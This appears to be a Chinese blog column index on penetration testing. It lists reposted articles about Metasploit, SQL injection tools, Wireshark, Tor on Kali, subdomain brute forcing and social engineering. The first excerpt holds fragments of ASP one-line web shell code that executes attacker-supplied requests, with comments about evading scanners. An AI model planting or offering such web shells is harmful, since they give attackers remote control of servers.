渗透测试
关注
分享
扫一扫
文章平均质量分 87
guangyinglanshan
。。。
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
一句话木马
%>""then session("c")=request("c"):end if:if session("c") '备份专用 '无防下载表,有防下载表突破专用一句话 '防杀防扫专用 "" ThenExecuteGlobal(Request("c"))%> '不用"" execute request("c") <% @Language翻译 2017-02-18 19:34:53 · 773 阅读 · 0 评论 -
工具篇 啊D
检测注入漏洞先将下载好的正版无毒的啊D注入工具打开,大体上先熟悉啊D的功能布局,如注意观察下图左侧的<注入检测>里的<SQL注入检测>、<浏览网页>、<相关工具>选项的功能等,下面会用到在<检测网址>的栏内可以输入要注入的网址点击<注入检测>里的<浏览网页>图标,即可浏览该网页然后稍等片刻,如图下方就出现了红色的&转载 2018-04-13 15:30:49 · 1356 阅读 · 0 评论 -
wireshark常用选项与功能总结【10分钟成为抓包大师】
这段时间用wireshark比较多,所以想顺便给大家写个简单的wireshark教程出来,因为wireshark的入门抓包比较简单,选择网卡,然后直接start就开始抓包了,不需要做什么修改,但是如果想要灵活的运用wireshark转包就需要对wireshark很多选项都要了解。因为选项比较多,但真正实用且用的比较多的功能就那几个,所以我把这些功能总结出来,以供新手能够快速上手。首先来个初步的思维...转载 2018-03-14 19:58:48 · 2125 阅读 · 0 评论 -
Whitewidow:SQL 漏洞自动扫描工具
Whitewidow 是一个开源的 SQL 漏洞自动扫描器,可用通过文件列表运行,或者从 Google 爬取并发现有潜在漏洞的网站。 这个工具支持自动格式化文件、随机用户代理、IP 地址、服务器信息、多 SQL 注入语法、从程序直接启动 sqlmap 以及一些有趣的环境。Whitewidow 是为学习目的而开发,旨在让用户知道漏洞是啥样的。截图启动 whitewidow 后,会有个定制的 Bann转载 2018-01-18 09:49:50 · 613 阅读 · 0 评论 -
渗透测试:域名爆破及端口扫描
对每个企业的web安全都起了至关重要的作用。在渗透测试过程中,最先要做的就是信息收集,子域名爆破就是信息收集中重要的一个环节。发现的子域名越多,渗透测试的切入点就越多,也越容易找到网站弱点所在。端口扫描主要通过对枚举出来的子域名对应的IP地址的扫描来确定目标网站所用服务器的系统、所开端口等信息,进而了解目标网站的架构及应用部署情况。 本文使用Python脚本,实现了子域名爆破及端口扫描的转载 2017-12-26 09:43:03 · 2555 阅读 · 0 评论 -
SQL注入
我想告诉你的是一个简单的技术,可以有效地用于现代Web应用程序,比如在NodeJS和MongoDB上编写的应用程序。实质上,这种技术与SQL注入(SQLI)非常相似,虽然简单得多,因为我们不必完成任何奇怪和复杂的字符串。在我继续之前,我想说的是,虽然我在谈论NodeJS,但在下面的示例中,我使用ExpressJS,它是最受欢迎的节点Web框架,也是NodeJS社区中的事实标准。转载 2017-11-20 17:19:57 · 355 阅读 · 0 评论 -
kali 漏洞利用metasploit
Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录转载 2017-08-15 18:36:00 · 1082 阅读 · 0 评论 -
kali 首次启动metasploit
么运行 Metasploit Framework运行 service Metasploit start 无任何反应,提醒报错:Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.1.在kali中metasploit转载 2017-08-15 18:24:08 · 8547 阅读 · 1 评论 -
root用户无法运行tor解决办法(The tor browser bundle should not be run as root )
遇到这个问题,有两个解决办法:1、创建一个用户,运行tor;2、编辑“start-tor-browser”文件,找到下面语句,删除或注释掉即可运行:#if [ “`id -u`” -eq 0 ]; then# complain “The Tor Browser Bundle should not be run as root. Exiting.”# exit转载 2017-08-16 11:44:41 · 3718 阅读 · 0 评论 -
kali安装tor
http://www.blackmoreops.com/2013/12/16 /installing-tor-kali-linux/ HomeKali LinuxHackingHow toVirtual Private Network (VPN)Popular CategoriesA翻译 2017-08-16 11:17:05 · 8798 阅读 · 0 评论 -
kali更新源
更换更新源,命令行中执行一下命令/etc/apt/sources.list2替换sources.list里面的内容可以使用以下三个源(使用一个即可) #kali官方源 deb http://http.kali.org/kali kali-rolling main non-free contrib #中科大的源 deb翻译 2017-08-16 10:58:10 · 14536 阅读 · 2 评论 -
社会工程学框架
目录:一、概述二、信息收集三、社工心理学四、社工的影响与操纵五、攻击方式六、攻击工具一、概述狭义与广义社会工程学最明显的区别就是是否会与受害者产生交互行为。广义是有针对性的去对某一单一或多一目标进行攻击的行为。社会工程学的任何行为来影响一个人的判断。社工三大法宝:网络钓鱼、电话钓鱼、伪装模拟(包含很多)狭义三大法宝:谷歌、社工库、QQ社工师的分类:①、黑客②、渗透测试③、间谍④、特工⑤、gov⑥、...转载 2018-06-24 17:42:45 · 2377 阅读 · 0 评论